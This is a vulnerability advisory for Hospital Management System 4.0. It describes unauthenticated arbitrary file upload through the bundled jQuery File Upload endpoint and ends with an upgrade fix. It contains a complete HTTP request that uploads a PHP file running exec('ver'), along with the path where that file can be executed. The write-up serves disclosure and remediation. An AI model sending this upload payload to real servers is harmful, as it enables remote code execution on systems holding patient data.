Affected Version: Hospital Management System 4.0

Product Link: https://github.com/kishan0725/Hospital-Management-System

Security Issue:

Unauthenticated arbitrary file upload via jQuery File Upload in POST Request via files[] parameter

URL: <http://localhost/Hospital-Management-System/vendor/jquery-file-upload/server/php/index.php>
Vulnerable Parameter: files[]
Method: POST
Payload: 
<?php echo exec("ver");?>
--a211583f728c46a09ca726497e0a5a9f--

Vulnerability Description:

jQuery File Upload is a file upload widget with multiple file selection, drag&drop support, progress bars, validation and preview images, audio and video for jQuery.

A change in Apache's Web Server security setting handling exposed users of this plugin to an unrestricted file upload flaw.

HTTP Request:

POST /Hospital-Management-System/vendor/jquery-file-upload/server/php/index.php HTTP/1.1
Content-Type: multipart/form-data; boundary=a211583f728c46a09ca726497e0a5a9f
Cookie: PHPSESSID=
Content-Length: 177
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Host: localhost
Connection: Keep-alive

--a211583f728c46a09ca726497e0a5a9f
Content-Disposition: form-data; name="files[]"; filename="osversion.php"

<?php echo exec("ver");?>
--a211583f728c46a09ca726497e0a5a9f--

HTTP Response:

Screenshot:

# Visiting the URL will download the file uploaded, but with the code execution content.
URL of uploaded file: <http://localhost/Hospital-Management-System/vendor/jquery-file-upload/server/php/files/osversion.php>

The impact of this vulnerability:

An attacker could upload and execute malicious PHP code.

How to fix this vulnerability:

Upgrade to the latest version of jQuery File Upload. This vulnerability was fixed in jQuery File Upload v9.22.1